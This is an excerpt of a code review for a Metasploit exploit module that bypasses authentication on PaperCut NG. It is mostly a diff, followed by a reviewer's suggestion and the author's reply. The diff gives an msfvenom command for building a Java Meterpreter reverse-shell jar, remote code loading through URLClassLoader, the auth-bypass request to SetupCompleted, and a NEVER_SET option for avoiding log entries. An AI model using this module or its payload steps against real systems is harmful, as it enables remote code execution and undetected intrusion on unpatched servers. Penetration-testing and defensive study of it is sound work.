modules/exploits/multi/http/papercut_ng_auth_bypass.rb

```diff
@@ -0,0 +1,282 @@
+          and 'print.script.sandboxed' options to allow for arbitrary code execution running in
+          the builtin RhinoJS engine.
+
+          For code injection we utilize the URLClassLoader to load a remote URL containing a
+          ".jar" file, this file must already exist and must contain a "main" method accepting
+          no command line arguments. We recommend generating this jar file using msfvenom with a
+          java/meterpreter/reverse_tcp payload, e.g. `msfvenom -p java/meterpreter/reverse_tcp --format jar --encoder generic/none
+          LHOST=[lhost] LPORT=[lport] -o shell.jar
+
+          This module logs at most 2 events in the application log of papercut. Each event is tied
+          to modifcation of server settings. Use NEVER_SET to avoid log generation entirely when
+          targeting already vulnerable systes.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'catatonicprime' ],
+        'References' => [
+          [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ]
+        ],
+        'Targets' => [ [ 'Automatic Target', {}] ],
+        'Platform' => [ 'java' ],
+        'Payload' => {},
+        'Privileged' => true,
+        'DisclosureDate' => '2023-03-13',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true,
+          'PAYLOAD' => 'java/meterpreter/reverse_tcp',
+          'RPORT' => '9191',
+          'SSL' => 'false',
+          'TARGETURI' => '/app',
+          'PAYLOAD_CLASS' => 'metasploit.Payload',
+          'JAR_FILE' => '',
+          'HTTPDELAY' => 10
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to the papercut application']),
+        OptString.new('PAYLOAD_CLASS', [false, 'Class containing main method to load']),
+        OptString.new('JAR_FILE', [true, 'Local path to jar file to serve, e.g. msfvenom output jar file']),
+        OptInt.new('HTTPDELAY', [false, 'Path to the papercut application']),
+        OptBool.new('NEVER_SET', [false, 'Never set server options to avoid unnecessary log events.'])
+      ], self.class
+    )
+  end
+
+  def bypass_auth
+    # Hit the SetupCompleted Page & establish an authenticated session.
+    # Return success/fail or vuln/not vuln based on response values
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'service' => 'page/SetupCompleted'
+        }
+      }
+    )
+    return Exploit::CheckCode::Safe unless res && res.code == 200
+
+    return Exploit::CheckCode::Vulnerable
+  end
+
+  def set_server_option(name, value)
```

Comment:
I would recommend seeing about writing a `get_server_option(name)` function, so you can know what the values are ahead of time, and reset them if need be.

Reply:
I didn't actually see this comment until after the changes, but I did split the functionality out into a get_config_option and set_config_option here: https://github.com/rapid7/metasploit-framework/pull/17936/commits/0be38eb3ab0d8e977095c416777e8e79c8ae6e55

It was something that was kind of already in it, but now it's definitely more clear (and likely to become even more clear as I iterate further).